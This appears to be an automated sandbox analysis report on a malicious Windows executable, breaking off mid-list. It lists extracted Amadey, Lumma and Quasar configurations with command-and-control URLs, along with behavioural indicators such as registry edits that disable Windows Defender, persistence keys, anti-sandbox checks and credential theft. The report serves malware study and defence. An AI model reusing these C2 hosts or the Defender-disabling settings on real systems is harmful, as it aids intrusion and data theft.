Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 09:14
Static task
static1
General
-
Target
file.exe
-
Size
4.1MB
-
MD5
a515a66a168e9ef511c34abf945f1ff4
-
SHA1
e63bc3328a8ea75b6616c8ec4b286bbdec943525
-
SHA256
45c7ff8e9ea76d1c1d91bb4b6f9ca3ad9dbb2707122c32e68d1d199d5beb189e
-
SHA512
cc254c9ccd24b4c8017c0172c8d57a7d23d15fd7120e44c8fe7e84df4527f88d2ff8cfda5481d5eccadf0ba066b1d6bad2cbac1f2be3ac2ad2c123949af279e3
-
SSDEEP
98304:X+2tteQQlmhqbZYtUbi+tQMcWptpmhtmfuxCi:X+xQgmEbZY65QMt3pmhoGCi
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://radvennture.top/GKsiio
https://targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://wstarcloc.bet/GOksAo
https://advennture.top/GKsiio
https://atargett.top/dsANGt
https://orodformi.run/aUosoz
https://6targett.top/dsANGt
https://hcosmosyf.top/GOsznj
https://hywnnavstarx.shop/FoaJSi
https://dmetalsyo.digital/opsa
https://-targett.top/dsANGt
https://byteplusx.digital/aXweAX
https://travewlio.shop/ZNxbHi
https://skynetxc.live/AksoPA
https://pixtreev.run/LkaUz
https://sparkiob.digital/KeASUp
https://appgridn.live/LEjdAK
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2332-993-0x0000000000870000-0x0000000000CE8000-memory.dmp healer behavioral1/memory/2332-996-0x0000000000870000-0x0000000000CE8000-memory.dmp healer behavioral1/memory/2332-1097-0x0000000000870000-0x0000000000CE8000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 9220b9dffd.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 9220b9dffd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 9220b9dffd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 9220b9dffd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 9220b9dffd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 9220b9dffd.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 9220b9dffd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 9220b9dffd.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 9220b9dffd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 9220b9dffd.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/memory/5680-2526-0x00000000087E0000-0x0000000008934000-memory.dmp family_quasar behavioral1/memory/5680-2527-0x0000000008970000-0x000000000898A000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4924 created 2640 4924 MSBuild.exe 44 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2y1617.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 23da5e6bb9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ad3a6208a1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 29043e627c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a0314adca1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1Q30C9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d0249e62d5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9220b9dffd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 91c4598add.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 268 5680 powershell.exe 446 5680 powershell.exe -
pid Process 740 powershell.exe 7144 powershell.exe 5680 powershell.exe 6872 powershell.exe 7836 powershell.exe 6760 powershell.exe 12488 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 21 IoCs
flow pid Process 293 6712 svchost.exe 290 5056 rapes.exe 188 5056 rapes.exe 188 5056 rapes.exe 188 5056 rapes.exe 237 5056 rapes.exe 323 5056 rapes.exe 33 5056 rapes.exe 33 5056 rapes.exe 33 5056 rapes.exe 33 5056 rapes.exe 33 5056 rapes.exe 33 5056 rapes.exe 33 5056 rapes.exe 33 5056 rapes.exe 33 5056 rapes.exe 33 5056 rapes.exe 189 5028 svchost015.exe 193 1632 svchost015.exe 257 5056 rapes.exe 257 5056 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 3132 takeown.exe 5724 icacls.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\3QNjYQu_2516\ImagePath = "\\??\\C:\\Windows\\Temp\\3QNjYQu_2516.sys" tzutil.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 7148 msedge.exe 7212 msedge.exe 7536 msedge.exe 6200 msedge.exe 2820 chrome.exe 1628 chrome.exe 6188 chrome.exe 7960 chrome.exe -
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 23da5e6bb9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d0249e62d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2039335369.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2039335369.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a0314adca1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a0314adca1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1Q30C9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 29043e627c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 91c4598add.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 23da5e6bb9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ad3a6208a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9220b9dffd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 91c4598add.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1Q30C9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2y1617.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ad3a6208a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 29043e627c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d0249e62d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9220b9dffd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2y1617.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 1Q30C9.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 261.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Deletes itself 1 IoCs
pid Process 7028 w32tm.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c896ff49.cmd powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c896ff49.cmd powershell.exe -
Executes dropped EXE 36 IoCs
pid Process 1748 G4l05.exe 2352 1Q30C9.exe 5056 rapes.exe 2036 2y1617.exe 5472 apple.exe 1808 261.exe 1912 261.exe 2924 rapes.exe 1164 23da5e6bb9.exe 4124 3sZiUQa.exe 4464 ad3a6208a1.exe 5028 svchost015.exe 1700 29043e627c.exe 1632 svchost015.exe 1056 d0249e62d5.exe 5852 2039335369.exe 1724 4760908696.exe 2332 9220b9dffd.exe 5092 ca8acd6286.exe 5008 rapes.exe 5200 3514bb24fc.exe 6368 3sZiUQa.exe 6576 91c4598add.exe 6796 h8NlU62.exe 724 XOPPRUc.exe 3744 7IIl2eE.exe 8096 captcha.exe 4836 Passwords.com 8092 a0314adca1.exe 5816 TbV75ZR.exe 5812 qWR3lUj.exe 1964 rapes.exe 4576 p3hx1_003.exe 2516 tzutil.exe 7028 w32tm.exe 4264 Rm3cVPI.exe -
Identifies Wine through registry keys 2 TTPs 13 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 1Q30C9.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine ad3a6208a1.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine d0249e62d5.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 9220b9dffd.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 91c4598add.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 2y1617.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 23da5e6bb9.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 29043e627c.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine a0314adca1.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 3132 takeown.exe 5724 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 9220b9dffd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 9220b9dffd.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d0249e62d5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416990101\\d0249e62d5.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2039335369.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10417000101\\2039335369.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4760908696.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10417010101\\4760908696.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9220b9dffd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10417020101\\9220b9dffd.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" file.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" G4l05.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: captcha.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 91c4598add.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000c000000024267-204.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 22 IoCs
pid Process 7276 tasklist.exe 4404 tasklist.exe 6188 tasklist.exe 7192 tasklist.exe 7576 tasklist.exe 6892 tasklist.exe 3604 tasklist.exe 3812 tasklist.exe 5012 tasklist.exe 7900 tasklist.exe 3480 tasklist.exe 5840 tasklist.exe 4800 tasklist.exe 2412 tasklist.exe 7996 tasklist.exe 6232 tasklist.exe 6028 tasklist.exe 6452 tasklist.exe 6760 tasklist.exe 6992 tasklist.exe 7524 tasklist.exe 6220 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
pid Process 2352 1Q30C9.exe 5056 rapes.exe 2036 2y1617.exe 2924 rapes.exe 1164 23da5e6bb9.exe 4464 ad3a6208a1.exe 1700 29043e627c.exe 1056 d0249e62d5.exe 2332 9220b9dffd.exe 5008 rapes.exe 6576 91c4598add.exe 8092 a0314adca1.exe 1964 rapes.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 4464 set thread context of 5028 4464 ad3a6208a1.exe 183 PID 1700 set thread context of 1632 1700 29043e627c.exe 193 PID 5092 set thread context of 5368 5092 ca8acd6286.exe 221 PID 6796 set thread context of 6820 6796 h8NlU62.exe 229 PID 724 set thread context of 5560 724 XOPPRUc.exe 232 PID 5816 set thread context of 4924 5816 TbV75ZR.exe 402 PID 5812 set thread context of 2416 5812 qWR3lUj.exe 414 -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job 1Q30C9.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 7144 powershell.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1768 sc.exe 1452 sc.exe 5960 sc.exe 5464 sc.exe 4828 sc.exe 5088 sc.exe 3628 sc.exe 1960 sc.exe 2584 sc.exe 4288 sc.exe 3896 sc.exe 2780 sc.exe 3496 sc.exe 2676 sc.exe 5228 sc.exe 3304 sc.exe 3068 sc.exe 3904 sc.exe 664 sc.exe 5192 sc.exe 2380 sc.exe 5804 sc.exe 6072 sc.exe 6112 sc.exe 1236 sc.exe 4208 sc.exe 5532 sc.exe 6084 sc.exe 2332 sc.exe 396 sc.exe 4284 sc.exe 1172 sc.exe 2416 sc.exe 2540 sc.exe 2112 sc.exe 1576 sc.exe 5484 sc.exe 2592 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5692 4924 WerFault.exe 402 -
System Location Discovery: System Language Discovery 1 TTPs 51 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 23da5e6bb9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 29043e627c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 91c4598add.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0249e62d5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language p3hx1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4760908696.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 4760908696.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a0314adca1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language G4l05.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ad3a6208a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3514bb24fc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2y1617.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 4760908696.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9220b9dffd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1Q30C9.exe -
Checks processor information in registry 2 TTPs 26 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 2039335369.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 2039335369.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened 